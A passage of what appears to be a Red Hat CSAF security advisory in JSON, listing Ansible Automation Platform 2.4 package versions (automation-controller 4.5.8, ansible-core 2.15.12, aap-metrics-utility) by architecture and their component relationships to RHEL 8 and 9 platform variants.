"product_id": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product_id": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el8ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product_id": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.15.12-1.el8ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.5.8-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.5.8-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.5.8-1.el8ap?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product_id": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product_id": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product_id": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product_id": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product_id": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product_id": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product_id": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product_id": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
